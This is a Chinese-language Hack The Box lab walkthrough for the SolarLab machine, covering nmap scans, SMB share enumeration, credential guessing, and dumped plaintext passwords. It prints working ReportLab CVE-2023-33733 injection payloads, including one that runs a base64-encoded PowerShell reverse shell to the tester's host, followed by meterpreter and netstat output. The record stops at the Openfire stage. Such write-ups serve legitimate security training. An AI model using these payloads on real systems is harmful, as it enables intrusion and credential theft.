HTB SolarLab

SolarLab

user

Nmap

➜  solarLab nmap 10.10.11.16 -p- -T 4
Starting Nmap 7.80 ( https://nmap.org ) at 2024-05-17 13:04 CST
Stats: 0:00:05 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 0.72% done
Stats: 0:00:05 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 0.83% done
Stats: 0:00:30 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 16.77% done; ETC: 13:07 (0:02:29 remaining)
Stats: 0:00:47 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 36.06% done; ETC: 13:06 (0:01:25 remaining)
Stats: 0:01:19 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 71.90% done; ETC: 13:05 (0:00:31 remaining)
Nmap scan report for solarlab.htb (10.10.11.16)
Host is up (0.084s latency).
Not shown: 65530 filtered ports
PORT     STATE SERVICE
80/tcp   open  http
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
6791/tcp open  hnm

Nmap done: 1 IP address (1 host up) scanned in 105.81 seconds
➜  solarLab nmap 10.10.11.16 -p- -T 4
➜  solarLab vim nmap
➜  solarLab cat nmap
PORT     STATE SERVICE
80/tcp   open  http
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
6791/tcp open  hnm
➜  solarLab cat nmap |grep -oE [0-9]
zsh: no matches found: [0-9]
➜  solarLab cat nmap |grep -oE [0-9]*
zsh: no matches found: [0-9]*
➜  solarLab cat nmap |grep -oE "[0-9]*"
80
135
139
445
6791
➜  solarLab cat nmap |grep -oE "[0-9]*" > port
➜  solarLab cat nmap |grep -oE "[0-9]*" | paste -sd ','
80,135,139,445,6791
➜  solarLab port=(cat nmap |grep -oE "[0-9]*" | paste -sd ',')
zsh: parse error near `|'
➜  solarLab port=$(cat nmap |grep -oE "[0-9]*" | paste -sd ',')
➜  solarLab port
zsh: command not found: port
➜  solarLab echo $port
80,135,139,445,6791
➜  solarLab nmap 10.10.11.16 -p 80,135,139,445,6791 -sCV
Starting Nmap 7.80 ( https://nmap.org ) at 2024-05-17 13:08 CST
Nmap scan report for solarlab.htb (10.10.11.16)
Host is up (0.10s latency).

PORT     STATE SERVICE       VERSION
80/tcp   open  http          nginx 1.24.0
|_http-server-header: nginx/1.24.0
|_http-title: SolarLab Instant Messenger
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
6791/tcp open  http          nginx 1.24.0
|_http-server-header: nginx/1.24.0
|_http-title: Did not follow redirect to http://report.solarlab.htb:6791/
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: -5m16s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2024-05-17T05:03:45
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 52.50 seconds

window 机器,80,135,139,445,6791

80

img

截取用户名

➜  solarLab cat username
ALEXANDER
Alexander Knight
BLAKE
Blake Byte
CLAUDIA
Claudia Springer
alexander
blake
claudia

img

成功枚举出有效用户名拥有对smb可读权限的用户

➜  solarLab crackmapexec smb 10.10.11.16 -u username -p '' --shares --rid-brute 10000
SMB         10.10.11.16     445    SOLARLAB         [*] Windows 10.0 Build 19041 x64 (name:SOLARLAB) (domain:solarlab) (signing:False) (SMBv1:False)
SMB         10.10.11.16     445    SOLARLAB         [+] solarlab\ALEXANDER:
SMB         10.10.11.16     445    SOLARLAB         [*] Enumerated shares
SMB         10.10.11.16     445    SOLARLAB         Share           Permissions     Remark
SMB         10.10.11.16     445    SOLARLAB         -----           -----------     ------
SMB         10.10.11.16     445    SOLARLAB         ADMIN$                          Remote Admin
SMB         10.10.11.16     445    SOLARLAB         C$                              Default share
SMB         10.10.11.16     445    SOLARLAB         Documents       READ
SMB         10.10.11.16     445    SOLARLAB         IPC$            READ            Remote IPC
SMB         10.10.11.16     445    SOLARLAB         500: SOLARLAB\Administrator (SidTypeUser)
SMB         10.10.11.16     445    SOLARLAB         501: SOLARLAB\Guest (SidTypeUser)
SMB         10.10.11.16     445    SOLARLAB         503: SOLARLAB\DefaultAccount (SidTypeUser)
SMB         10.10.11.16     445    SOLARLAB         504: SOLARLAB\WDAGUtilityAccount (SidTypeUser)
SMB         10.10.11.16     445    SOLARLAB         513: SOLARLAB\None (SidTypeGroup)
SMB         10.10.11.16     445    SOLARLAB         1000: SOLARLAB\blake (SidTypeUser)
SMB         10.10.11.16     445    SOLARLAB         1001: SOLARLAB\openfire (SidTypeUser)
➜  solarLab smbclient   //10.10.11.16/Documents    -U ALEXANDER
Password for [WORKGROUP\ALEXANDER]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                  DR        0  Fri Apr 26 22:47:14 2024
  ..                                 DR        0  Fri Apr 26 22:47:14 2024
  concepts                            D        0  Fri Apr 26 22:41:57 2024
  desktop.ini                       AHS      278  Fri Nov 17 18:54:43 2023
  details-file.xlsx                   A    12793  Fri Nov 17 20:27:21 2023
  My Music                        DHSrn        0  Fri Nov 17 03:36:51 2023
  My Pictures                     DHSrn        0  Fri Nov 17 03:36:51 2023
  My Videos                       DHSrn        0  Fri Nov 17 03:36:51 2023
  old_leave_request_form.docx         A    37194  Fri Nov 17 18:35:57 2023
                                                                                                                                                                                          7779839 blocks of size 4096. 1876511 blocks available

批量下载

➜  smb smbclient   //10.10.11.16/Documents    -U ALEXANDER -c "prompt off;recurse on;mget *"
Password for [WORKGROUP\ALEXANDER]:
getting file \desktop.ini of size 278 as desktop.ini (0.9 KiloBytes/sec) (average 0.9 KiloBytes/sec)
getting file \details-file.xlsx of size 12793 as details-file.xlsx (34.3 KiloBytes/sec) (average 18.8 KiloBytes/sec)
getting file \old_leave_request_form.docx of size 37194 as old_leave_request_form.docx (81.1 KiloBytes/sec) (average 43.6 KiloBytes/sec)
getting file \concepts\Training-Request-Form.docx of size 161337 as concepts/Training-Request-Form.docx (346.3 KiloBytes/sec) (average 130.7 KiloBytes/sec)
getting file \concepts\Travel-Request-Sample.docx of size 30953 as concepts/Travel-Request-Sample.docx (83.0 KiloBytes/sec) (average 121.8 KiloBytes/sec)
NT_STATUS_ACCESS_DENIED listing \My Music\*
NT_STATUS_ACCESS_DENIED listing \My Pictures\*
NT_STATUS_ACCESS_DENIED listing \My Videos\*

这里面old_leave_request_form.docx 是请假申请表模板

detail-file.xlsx

img

拿到了一个密码本

➜  solarLab crackmapexec winrm 10.10.11.16  -u username -p password

尝试winrm 爆破,失败

6791

➜  solarLab curl solarlab.htb:6791 -v
*   Trying 10.10.11.16:6791...
* TCP_NODELAY set
* Connected to solarlab.htb (10.10.11.16) port 6791 (#0)
> GET / HTTP/1.1
> Host: solarlab.htb:6791
> User-Agent: curl/7.68.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 301 Moved Permanently
< Server: nginx/1.24.0
< Date: Fri, 17 May 2024 05:05:18 GMT
< Content-Type: text/html
< Content-Length: 169
< Connection: keep-alive
< Location: http://report.solarlab.htb:6791/
<
<html>
<head><title>301 Moved Permanently</title></head>
<body>
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx/1.24.0</center>
</body>
</html>
* Connection #0 to host solarlab.htb left intact

301 跳转到report.solarlab.htb

img

img

img

AlexanderKClaudiaS

这两个用户名是存在的密码错误

尝试使用密码和密保答案作为密码payload

img

没有爆破成功

尝试枚举更多用户名

from datetime import datetime
import argparse

def generate_additional_combinations(parts):
    print(parts)
    combinations = set()
    # 如果名字由名和姓组成(两部分),生成特定格式
    if len(parts) == 2:
        # A全小写B首字母小写的情况
        combinations.add(parts[0].lower() + parts[1][0].lower() + parts[1][1:])
        combinations.add(parts[0].lower() + parts[1][0].lower())
        combinations.add(parts[0].upper() + parts[1][0].upper())

        combinations.add(parts[1].lower() + parts[0][0].lower())
        combinations.add(parts[1].upper() + parts[0][0].upper())
    print("combinations = > ",combinations)
    return combinations

def generate_usernames(usernames):
    generated_usernames = set()
    for name in usernames:
        parts = name.split()  # 按空格分割
        if '.' in name:
            parts = name.split('.')  # 按点号分割

        # 常见的用户名组合
        generated_usernames.add(name.lower())  # 全小写
        generated_usernames.add(name.upper())  # 全大写
        generated_usernames.add(''.join(part[0] for part in parts).lower())  # 首字母小写组合
        generated_usernames.add('.'.join(parts).lower())  # 点连接小写

        # 特殊的用户名组合
        generated_usernames.update(generate_additional_combinations(parts))

    return sorted(generated_usernames)

def read_usernames(filename):
    with open(filename, 'r') as file:
        return [line.strip() for line in file if line.strip()]

def main():
    parser = argparse.ArgumentParser(description='Generate possible usernames.')
    parser.add_argument('-f', '--input-file', required=True, help='Input file containing a list of usernames.')
    parser.add_argument('-o', '--output-file', default='output.txt', help='Output file for possible usernames.')

    args = parser.parse_args()

    usernames = read_usernames(args.input_file)
    new_usernames = generate_usernames(usernames)
    with open(args.output_file, 'w') as file:
        for username in new_usernames:
            file.write(username + '\n')

    print(f"Username combinations have been written to {args.output_file}")

if __name__ == "__main__":
    main()

img

blakeb

BLAKEB : ThisCanB3typedeasily1@

为有效凭证

img

这个后台的作用是发起各种工单请求,比如请假,旅游等等…

img

img

➜  solarLab exiftool output.pdf
ExifTool Version Number         : 12.76
File Name                       : output.pdf
Directory                       : .
File Size                       : 292 kB
File Modification Date/Time     : 2024:05:17 14:09:50+08:00
File Access Date/Time           : 2024:05:17 14:10:05+08:00
File Inode Change Date/Time     : 2024:05:17 14:10:05+08:00
File Permissions                : -rw-r--r--
File Type                       : PDF
File Type Extension             : pdf
MIME Type                       : application/pdf
PDF Version                     : 1.4
Linearized                      : No
Author                          : (anonymous)
Create Date                     : 2024:05:17 09:03:21-02:00
Creator                         : (unspecified)
Modify Date                     : 2024:05:17 09:03:21-02:00
Producer                        : ReportLab PDF Library - www.reportlab.com
Subject                         : (unspecified)
Title                           : (anonymous)
Trapped                         : False
Page Mode                       : UseNone
Page Count                      : 1

看到关机信息 reportlab.com ,网上相关搜索,找到reportlab相关漏洞

CVE-2023-33733

Refere:https://github.com/c53elyas/CVE-2023-33733

https://security.snyk.io/vuln/SNYK-PYTHON-REPORTLAB-5664897

通过查看cve描述,通过可以在html页面插入恶意内容从而导致rce

选择填Home Office request 申请,输入内容时,会有长度限制,直接用F12修改

img

 <para>
              <font color="[ [ getattr(pow,Word('__globals__'))['os'].system('curl 10.10.16.10') for Word in [orgTypeFun('Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: False, '__eq__': lambda self,x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: {setattr(self, 'mutated', self.mutated - 1)}, '__hash__': lambda self: hash(str(self)) })] ] for orgTypeFun in [type(type(1))] ] and 'red'">
                exploit
                </font>
            </para>

img

img

成功收到了请求

Reverse Shell

img

 <para>
              <font color="[ [ getattr(pow,Word('__globals__'))['os'].system('powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA2AC4AMQAwACIALAA0ADQANAA0ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==') for Word in [orgTypeFun('Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: False, '__eq__': lambda self,x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: {setattr(self, 'mutated', self.mutated - 1)}, '__hash__': lambda self: hash(str(self)) })] ] for orgTypeFun in [type(type(1))] ] and 'red'">
                exploit
                </font>
            </para>

成功反弹shell

➜  htb rlwrap nc -lvnp 4444
Listening on 0.0.0.0 4444

Connection received on 10.10.11.16 49553
PS C:\Users\blake\Documents\app>

成功拿到了user

root

PS C:\Users\blake\desktop> systeminfo
                                                                                                                                                                          Host Name:                 SOLARLAB
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.19045 N/A Build 19045
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:
Product ID:                00330-80112-18556-AA133
Original Install Date:     11/16/2023, 9:37:33 PM
System Boot Time:          5/17/2024, 8:59:06 AM
System Manufacturer:       VMware, Inc.
System Model:              VMware7,1
System Type:               x64-based PC
Processor(s):              2 Processor(s) Installed.
                           [01]: AMD64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2994 Mhz
                           [02]: AMD64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2994 Mhz
BIOS Version:              VMware, Inc. VMW71.00V.16707776.B64.2008070230, 8/7/2020
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest
Total Physical Memory:     4,095 MB
Available Physical Memory: 2,673 MB
Virtual Memory: Max Size:  4,799 MB
Virtual Memory: Available: 3,147 MB
Virtual Memory: In Use:    1,652 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: vmxnet3 Ethernet Adapter
                                 Connection Name: Ethernet0 2
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.11.16
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.

win10的系统

PS C:\Users\blake\desktop> net user
                                                                                                                                                                          User accounts for \\SOLARLAB

-------------------------------------------------------------------------------
Administrator            blake                    DefaultAccount
Guest                    openfire                 WDAGUtilityAccount
The command completed successfully.

存在openfire 用户


meterpreter > execute -f powershell -i -H
Process 3920 created.
Channel 1 created.
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Try the new cross-platform PowerShell https://aka.ms/pscore6

PS C:\Users\blake\Documents\app> 来cd ..
ccd ..
d ..
PS C:\Users\blake\Documents> ls -cd ..
PS C:\Users\blals -re
ls -re

    Directory: C:\Users\blake

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-r---        11/16/2023   9:37 PM                3D Objects
d-r---        11/16/2023   9:37 PM                Contacts
d-r---         5/17/2024   9:45 AM                Desktop
d-r---         5/17/2024   9:22 AM                Documents
d-r---        11/16/2023   9:37 PM                Downloads
d-r---        11/16/2023   9:37 PM                Favorites
d-r---        11/16/2023   9:37 PM                Links
d-r---        11/16/2023   9:37 PM                Music
d-r---        11/16/2023   9:43 PM                OneDrive
d-r---        11/16/2023   9:37 PM                Pictures
d-r---        11/16/2023   9:37 PM                Saved Games
d-r---        11/16/2023   9:40 PM                Searches
d-r---        11/16/2023   9:37 PM                Videos

    Directory: C:\Users\blake\Desktop

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-ar---         5/17/2024   9:00 AM             34 user.txt
-a----         5/17/2024   9:45 AM        1969664 winPEASany.exe

    Directory: C:\Users\blake\Documents

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----         5/17/2024   9:50 AM                app
-a----         5/17/2024   9:22 AM        9006080 chisel.exe
-a----          5/4/2024   7:20 PM            243 start-app.bat

    Directory: C:\Users\blake\Documents\app

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----          5/2/2024  12:30 PM                instance
d-----         5/17/2024   9:38 AM                reports
d-----        11/17/2023  10:01 AM                static
d-----        11/17/2023  10:01 AM                templates
d-----         5/17/2024   9:50 AM                __pycache__
-a----        11/17/2023   9:59 AM           1278 app.py
-a----        11/16/2023   2:17 PM            315 models.py
-a----        11/18/2023   6:59 PM           7790 routes.py
-a----         5/17/2024   9:50 AM           7168 shell.exe
-a----          5/2/2024   6:26 PM           3352 utils.py

    Directory: C:\Users\blake\Documents\app\instance

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----          5/2/2024  12:30 PM          12288 users.db

    Directory: C:\Users\blake\Documents\app\reports

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----        11/17/2023  12:11 PM                instance

    Directory: C:\Users\blake\Documents\app\reports\instance

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----        11/17/2023  12:11 PM          12288 users.db

    Directory: C:\Users\blake\Documents\app\static

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----        11/17/2023  10:01 AM                css
d-----        11/17/2023  10:01 AM                images
d-----        11/17/2023  10:01 AM                js

    Directory: C:\Users\blake\Documents\app\static\css

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----        11/17/2023  10:01 AM                images
-a----        10/18/1991   3:00 PM          35973 jquery-ui.css
-a----        11/16/2023   2:56 PM          24743 quill.snow.css

    Directory: C:\Users\blake\Documents\app\static\css\images

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----        11/15/2023   8:02 PM          67680 logo.png
-a----        11/15/2023   4:10 PM         116706 signature.svg.png
-a----        11/16/2023   4:56 PM          29384 ui-icons_444444_256x240.png
-a----        11/16/2023   4:57 PM          29384 ui-icons_555555_256x240.png

    Directory: C:\Users\blake\Documents\app\static\images

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----        11/15/2023   8:02 PM          67680 logo.png
-a----        11/15/2023   8:02 PM         116706 signature.svg.png
-a----        11/16/2023   6:15 PM          29384 ui-icons_444444_256x240.png
-a----        11/16/2023   6:14 PM          29384 ui-icons_555555_256x240.png

    Directory: C:\Users\blake\Documents\app\static\js

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----        10/18/1991   3:00 PM         292458 jquery-3.6.4.js
-a----        10/18/1991   3:00 PM         520714 jquery-ui.js
-a----        11/16/2023   2:58 PM         437299 quill.js

    Directory: C:\Users\blake\Documents\app\templates

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----        11/16/2023   4:51 PM          14619 dashboard.html
-a----        11/16/2023   5:04 PM           6023 homeoffice.html
-a----        11/16/2023   5:00 PM           2274 index.html
-a----        11/16/2023   5:09 PM           6107 leave.html
-a----        11/16/2023   5:12 PM           6609 training.html
-a----        11/16/2023   5:04 PM           6010 travel.html

    Directory: C:\Users\blake\Documents\app\__pycache__

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----          5/2/2024   6:23 PM           2793 app.cpython-311.pyc
-a----        11/17/2023  10:15 AM            976 models.cpython-311.pyc
-a----          5/2/2024   5:09 PM          10121 routes.cpython-311.pyc
-a----          5/2/2024   1:13 PM           6540 utils.cpython-311.pyc

    Directory: C:\Users\blake\Favorites

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-r---         4/26/2024   5:50 PM                Links
-a----         4/26/2024   5:50 PM            208 Bing.url

    Directory: C:\Users\blake\Links

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----        11/16/2023   9:37 PM            494 Desktop.lnk
-a----        11/16/2023   9:37 PM            939 Downloads.lnk

    Directory: C:\Users\blake\Searches

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----        11/16/2023   9:40 PM            859 winrt--{S-1-5-21-3606151065-2641007806-276851432
                                                  0-1000}-.searchconnector-ms

users.db

➜  solarLab sqlite3 users.db
SQLite version 3.44.2 2023-11-24 11:41:44
Enter ".help" for usage hints.
sqlite> .tables;                                                                                                                                                          Error: unknown command or invalid arguments:  "tables;". Enter ".help" for help
sqlite> .tables
user
sqlite> select * from user;
1|blakeb|ThisCanB3typedeasily1@
2|claudias|007poiuytrewq
3|alexanderk|HotP!fireguard
sqlite> exit
   ...> ;                                                                                                                                                                 Parse error: near "exit": syntax error
  exit ;
  ^--- error here
sqlite> .q
➜  solarLab sqlite3 users_report.db/users.db
SQLite version 3.44.2 2023-11-24 11:41:44
Enter ".help" for usage hints.
sqlite> .tables
user
sqlite> select * from user;
1|BlakeB|BlakeB
2|ClaudiaS|ClaudiaS
3|AlexanderK|ClaudiaS
4|blakeb|ThisCanB3typedeasily1@
5|claudias|007poiuytrewq
6|alexanderk|HotP!fireguard

枚举了一些db文件中的凭据

Openfire

exit
meterpreter > netstat

Connection list
===============

    Proto  Local address      Remote address    State        User  Inode  PID/Program name
    -----  -------------      --------------    -----        ----  -----  ----------------
    tcp    0.0.0.0:80         0.0.0.0:*         LISTEN       0     0      5736/nginx.exe
    tcp    0.0.0.0:135        0.0.0.0:*         LISTEN       0     0      904/svchost.exe
    tcp    0.0.0.0:445        0.0.0.0:*         LISTEN       0     0      4/System
    tcp    0.0.0.0:5040       0.0.0.0:*         LISTEN       0     0      1336/svchost.exe
    tcp    0.0.0.0:5985       0.0.0.0:*         LISTEN       0     0      4/System
    tcp    0.0.0.0:6791       0.0.0.0:*         LISTEN       0     0      5736/nginx.exe
    tcp    0.0.0.0:47001      0.0.0.0:*         LISTEN       0     0      4/System
    tcp    0.0.0.0:49664      0.0.0.0:*         LISTEN       0     0      664/lsass.exe
    tcp    0.0.0.0:49665      0.0.0.0:*         LISTEN       0     0      532/wininit.exe
    tcp    0.0.0.0:49666      0.0.0.0:*         LISTEN       0     0      628/svchost.exe
    tcp    0.0.0.0:49667      0.0.0.0:*         LISTEN       0     0      1608/svchost.exe
    tcp    0.0.0.0:49668      0.0.0.0:*         LISTEN       0     0      656/services.exe
    tcp    10.10.11.16:139    0.0.0.0:*         LISTEN       0     0      4/System
    tcp    10.10.11.16:49241  10.10.14.3:9700   ESTABLISHED  0     0      1444/powershell.exe
    tcp    10.10.11.16:49272  10.10.14.3:6150   ESTABLISHED  0     0      588/chisel.exe
    tcp    10.10.11.16:49553  10.10.16.10:4444  CLOSE_WAIT   0     0      60/powershell.exe
    tcp    10.10.11.16:49555  10.10.14.29:5555  CLOSE_WAIT   0     0      3256/powershell.exe
    tcp    10.10.11.16:59100  10.10.14.29:5555  CLOSE_WAIT   0     0      3624/powershell.exe
    tcp    10.10.11.16:59115  10.10.14.29:5555  ESTABLISHED  0     0      264/powershell.exe
    tcp    10.10.11.16:59123  10.10.16.10:4444  ESTABLISHED  0     0      2852/shell.exe
    tcp    10.10.11.16:59127  10.10.14.29:445   ESTABLISHED  0     0      4/System
    tcp    10.10.11.16:59131  10.10.14.29:4444  ESTABLISHED  0     0      1084/nc.exe
    tcp    10.10.11.16:59136  10.10.16.10:445   SYN_SENT     0     0      4/System
    tcp    127.0.0.1:5000     0.0.0.0:*         LISTEN       0     0      -
    tcp    127.0.0.1:5000     0.0.0.0:*         LISTEN       0     0      5068/python3.11.exe
    tcp    127.0.0.1:5000     127.0.0.1:59130   CLOSE_WAIT   0     0      -
    tcp    127.0.0.1:5222     0.0.0.0:*         LISTEN       0     0      2104/openfire-service.exe
    tcp    127.0.0.1:5223     0.0.0.0:*         LISTEN       0     0      2104/openfire-service.exe
    tcp    127.0.0.1:5262     0.0.0.0:*         LISTEN       0     0      2104/openfire-service.exe
    tcp    127.0.0.1:5263     0.0.0.0:*         LISTEN       0     0      2104/openfire-service.exe
    tcp    127.0.0.1:5269     0.0.0.0:*         LISTEN       0     0      2104/openfire-service.exe
    tcp    127.0.0.1:5270     0.0.0.0:*         LISTEN       0     0      2104/openfire-service.exe
    tcp    127.0.0.1:5275     0.0.0.0:*         LISTEN       0     0      2104/openfire-service.exe
    tcp    127.0.0.1:5276     0.0.0.0:*         LISTEN       0     0      2104/openfire-service.exe
    tcp    127.0.0.1:7070     0.0.0.0:*         LISTEN       0     0      2104/openfire-service.exe
    tcp    127.0.0.1:7443     0.0.0.0:*         LISTEN       0     0      2104/openfire-service.exe
    tcp    127.0.0.1:9090     0.0.0.0:*         LISTEN       0     0      2104/openfire-service.exe
    tcp    127.0.0.1:9090     127.0.0.1:59132   TIME_WAIT    0     0      0/[System Process]
    tcp    127.0.0.1:9091     0.0.0.0:*         LISTEN       0     0      2104/openfire-service.exe
    tcp    127.0.0.1:49520    127.0.0.1:49521   ESTABLISHED  0     0      -
    tcp    127.0.0.1:49521    127.0.0.1:49520   ESTABLISHED  0     0      -
    tcp    127.0.0.1:49669    127.0.0.1:49670   ESTABLISHED  0     0      2104/openfire-service.exe
    tcp    127.0.0.1:49670    127.0.0.1:49669   ESTABLISHED  0     0      2104/openfire-service.exe
    tcp    127.0.0.1:49671    127.0.0.1:49672   ESTABLISHED  0     0      2104/openfire-service.exe
    tcp    127.0.0.1:49672    127.0.0.1:49671   ESTABLISHED  0     0      2104/openfire-service.exe
    tcp    127.0.0.1:49673    127.0.0.1:49674   ESTABLISHED  0     0      2104/openfire-service.exe
    tcp    127.0.0.1:49674    127.0.0.1:49673   ESTABLISHED  0     0      2104/openfire-service.exe
    tcp    127.0.0.1:49675    127.0.0.1:49676   ESTABLISHED  0     0      2104/openfire-service.exe
    tcp    127.0.0.1:49676    127.0.0.1:49675   ESTABLISHED  0     0      2104/openfire-service.exe
    tcp    127.0.0.1:49677    127.0.0.1:49678   ESTABLISHED  0     0      2104/openfire-service.exe
    tcp    127.0.0.1:49678    127.0.0.1:49677   ESTABLISHED  0     0      2104/openfire-service.exe
    tcp    127.0.0.1:49679    127.0.0.1:49680   ESTABLISHED  0     0      2104/openfire-service.exe
    tcp    127.0.0.1:49680    127.0.0.1:49679   ESTABLISHED  0     0      2104/openfire-service.exe
    tcp    127.0.0.1:49681    127.0.0.1:49682   ESTABLISHED  0     0      2104/openfire-service.exe
    tcp    127.0.0.1:49682    127.0.0.1:49681   ESTABLISHED  0     0      2104/openfire-service.exe
    tcp    127.0.0.1:49683    127.0.0.1:49684   ESTABLISHED  0     0      2104/openfire-service.exe
    tcp    127.0.0.1:49684    127.0.0.1:49683   ESTABLISHED  0     0      2104/openfire-service.exe
    tcp    127.0.0.1:49685    127.0.0.1:49686   ESTABLISHED  0     0      2104/openfire-service.exe
    tcp    127.0.0.1:49686    127.0.0.1:49685   ESTABLISHED  0     0      2104/openfire-service.exe
    tcp    127.0.0.1:49687    127.0.0.1:49688   ESTABLISHED  0     0      2104/openfire-service.exe
    tcp    127.0.0.1:49688    127.0.0.1:49687   ESTABLISHED  0     0      2104/openfire-service.exe
    tcp    127.0.0.1:49689    127.0.0.1:49690   ESTABLISHED  0     0      2104/openfire-service.exe
    tcp    127.0.0.1:49690    127.0.0.1:49689   ESTABLISHED  0     0      2104/openfire-service.exe
    tcp    127.0.0.1:49691    127.0.0.1:49692   ESTABLISHED  0     0      2104/openfire-service.exe
    tcp    127.0.0.1:49692    127.0.0.1:49691   ESTABLISHED  0     0      2104/openfire-service.exe
    tcp    127.0.0.1:49693    127.0.0.1:49694   ESTABLISHED  0     0      2104/openfire-service.exe
    tcp    127.0.0.1:49694    127.0.0.1:49693   ESTABLISHED  0     0      2104/openfire-service.exe
    tcp    127.0.0.1:49695    127.0.0.1:49696   ESTABLISHED  0     0      2104/openfire-service.exe
    tcp    127.0.0.1:49696    127.0.0.1:49695   ESTABLISHED  0     0      2104/openfire-service.exe
    tcp    127.0.0.1:49697    127.0.0.1:49698   ESTABLISHED  0     0      2104/openfire-service.exe
    tcp    127.0.0.1:49698    127.0.0.1:49697   ESTABLISHED  0     0      2104/openfire-service.exe
    tcp    127.0.0.1:49699    127.0.0.1:49700   ESTABLISHED  0     0      2104/openfire-service.exe
    tcp    127.0.0.1:49700    127.0.0.1:49699   ESTABLISHED  0     0      2104/openfire-service.exe
    tcp    127.0.0.1:49701    127.0.0.1:49702   ESTABLISHED  0     0      2104/openfire-service.exe
